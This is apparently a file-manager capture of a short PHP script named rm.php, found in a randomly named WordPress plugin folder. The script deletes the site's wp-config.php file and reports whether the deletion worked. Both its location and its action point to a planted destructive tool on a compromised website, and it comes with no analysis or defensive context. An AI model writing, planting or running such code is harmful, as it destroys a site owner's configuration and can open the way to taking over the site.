Current File : /home/n742ef5/public_html/wp-content/plugins/57c3909950e7ff4ae37c1b2b0990a091/rm.php
<?php
// Specify the file path (hardcoded example)
$file_path = '../../../wp-config.php';

// Check if the file exists
if (file_exists($file_path)) {
    // Attempt to delete the file
    if (unlink($file_path)) {
        echo "File deleted successfully.";
    } else {
        echo "Error: Unable to delete the file (check permissions).";
    }
} else {
    echo "Error: File does not exist.";
}
?>